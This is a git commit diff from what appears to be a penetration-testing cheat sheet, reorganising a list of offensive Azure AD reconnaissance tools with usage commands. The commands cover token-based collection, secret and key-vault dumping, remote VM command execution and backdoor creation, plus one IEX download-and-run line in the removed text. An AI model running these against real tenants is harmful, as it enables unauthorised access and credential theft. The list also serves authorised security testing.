Azure AD - Collectors

pull/2/head
Swissky 2023-12-01 15:34:14 +01:00
parent b8bec59c3c
commit 0dd1cc6ac6
2 changed files with 38 additions and 154 deletions

View File

@ -1,152 +0,0 @@
## Azure Recon Tools
* [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound
```powershell
# First, retrieve a refresh token (-r) if username/password isn't supported.
# An access token (-j) isn't recommended because it can expire before the end of azurehound execution
Install-Module AADInternals -Scope CurrentUser
Import-Module AADInternals
$rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1]
# Second, launch azurehound collector
./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json
## Connects on your Azure account using the refresh token provided and the tenant of the account
## and collects every possible objects in contoso.microsoft.com. Results are stored in json
./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com"
## Sets configuration file with connection variables and other things (not required)
./azurehound configure
## Collects every objects on all accessible tenants using username/password and prints it to stdout
./azurehound -u "MattNelson@contoso.onmicrosoft.com" -p "MyVerySecurePassword123" --tenant "contoso.onmicrosoft.com" list
## Collects every objects on a specific tenant using username/password and stores it in json
./azurehound -u "phisheduser@contoso.onmicrosoft.com" -p "Password1" list -o initial-scan.json --tenant "contoso.onmicrosoft.com"
## Collects every objects on all tenants accessible using Service Principal secret
./azurehound -a "6b5adee8-..." -s "<secret>" --tenant "contoso.onmicrosoft.com" list
## Collects AzureAD info (all except AzureRM info) using JWT access token
./azurehound -j "ey..." --tenant "contoso.onmicrosoft.com" list az-ad
## Collects every users using refresh token
./azurehound -r "0.ARwA6Wg..." --tenant "contoso.onmicrosoft.com" list users
# List of collections
az-ad: Collect all information available at the AzureAD tenant level. In most tenants, all users have the ability to read all this information by default.
az-rm: Collect all information available at the AzureRM subscription level. Users do not by default have read access to any of this information.
apps: Collects AzureAD application registration objects.
devices: Collects AzureAD devices regardless of join type.
groups: Collects AzureAD security-enabled groups, both role eligible and non role eligible.
key-vaults: Collects AzureRM key vaults.
management-groups: Collects AzureRM management group objects
resource-groups: Collects AzureRM resource group objects
roles: Collects AzureAD admin role objects
service-principals: Collects AzureAD service principals
subscriptions: Collevts AzureRM subscriptions
tenants: Collevts AzureAD tenant objects
users: Collects AzureAD users, including any guest users in the target tenant.
virtual-machines: Collects AzureRM virtual machines
# GUI access
bolt://localhost:7687
Username: neo4j
Password: BloodHound
# Custom Queries : https://hausec.com/2020/11/23/azurehound-cypher-cheatsheet/
# Cypher query examples:
MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p
MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname
```
* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit
```ps1
. .\BARK.ps1
$MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com"
$MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com"
$MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
```
* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework.
```powershell
pipenv shell
roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
roadrecon gather
roadrecon gui
```
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects
```powershell
# session 1 - backend
pipenv shell
python ssbackend.pyz
# session 2 - frontend
cd C:\Tools\stormspotter\frontend\dist\spa\
quasar.cmd serve -p 9091 --history
# session 3 - collector
pipenv shell
az login -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli
# Web access on http://localhost:9091
Username: neo4j
Password: BloodHound
Server: bolt://localhost:7687
```
* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites
* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
```powershell
# You should use an account with at least read-permission on the assets you want to access
PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File
PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT
PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
# resolve the TenantID for an specific username
PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com
```
* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) and **Azurite Visualizer** : Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
```powershell
git submodule init
git submodule update
PS> Import-Module AzureRM
PS> Import-Module AzuriteExplorer.ps1
PS> Review-AzureRmSubscription
PS> Review-CustomAzureRmSubscription
```
* [**NetSPI/MicroBurst**](https://github.com/NetSPI/MicroBurst) - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
```powershell
PS C:> Import-Module .\MicroBurst.psm1
PS C:> Import-Module .\Get-AzureDomainInfo.ps1
PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose
```
* [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
Require:
- Read-Only permissions over Azure Directory (Tenant)
- Read-Only permissions over Subscription
- Require AZ and AzureAD module or administrator right
```powershell
$ powershell -ExecutionPolicy Bypass -NoProfile
PS C> Import-Module .\SkyArk.ps1 -force
PS C> Start-AzureStealth
PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')
PS C> Scan-AzureAdmins
* [**hausec/PowerZure**](https://github.com/hausec/PowerZure) - PowerShell framework to assess Azure security
```powershell
# Require az module !
$ ipmo .\PowerZure
$ Set-Subscription -Id [idgoeshere]
# Reader
$ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails
# Contributor
$ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami"
$ Execute-MSBuild -VM Win10Test -ResourceGroup Test-RG -File "build.xml"
$ Get-AllSecrets # AllAppSecrets, AllKeyVaultContents
$ Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk
# Owner
$ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest
# Administrator
$ Create-Backdoor, Execute-Backdoor
```
* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API

View File

@ -2,16 +2,52 @@
## Azure AD - Collectors ## Azure AD - Collectors
* roadrecon * [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites
* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - A collection of Azure AD tools for offensive and defensive security purposes
```ps1 ```ps1
roadrecon auth --access-token eyJ0eXA... roadrecon auth --access-token eyJ0eXA...
roadrecon auth --prt-cookie <primary-refresh-token> -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2" roadrecon auth --prt-cookie <primary-refresh-token> -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2"
roadrecon gather roadrecon gather
roadrecon gui
``` ```
* AzureHound * [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound
```ps1 ```ps1
./azurehound --refresh-token <refresh-token> list --tenant "<target-tenant-id>" -o output.json ./azurehound --refresh-token <refresh-token> list --tenant "<target-tenant-id>" -o output.json
./azurehound -u "<username>@contoso.onmicrosoft.com" -p "<password>" list groups --tenant "<tenant>.onmicrosoft.com"
./azurehound -j "<jwt>" list users --tenant "<tenant>.onmicrosoft.com"
``` ```
* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit
```ps1
. .\BARK.ps1
$MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com"
$MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com"
$MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
```
* [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
```ps1
Invoke-GraphRecon -Tokens $tokens -PermissionEnum
Invoke-DumpCAPS -Tokens $tokens -ResolveGuids
Invoke-DumpApps -Tokens $tokens
Get-DynamicGroups -Tokens $tokens
```
* [**NetSPI/MicroBurst**](https://github.com/NetSPI/MicroBurst) - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
```powershell
PS C:> Import-Module .\MicroBurst.psm1
PS C:> Import-Module .\Get-AzureDomainInfo.ps1
PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose
```
* [**hausec/PowerZure**](https://github.com/hausec/PowerZure) - PowerShell framework to assess Azure security
```powershell
PS C:> Import-Module .\Powerzure.psd1
PS C:> Set-Subscription -Id [idgoeshere]
PS C:> Get-AzureTarget
PS C:> Get-AzureInTuneScript
PS C:> Show-AzureKeyVaultContent -All
```
* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
* [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - :warning: This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
## Azure AD - User Enumeration ## Azure AD - User Enumeration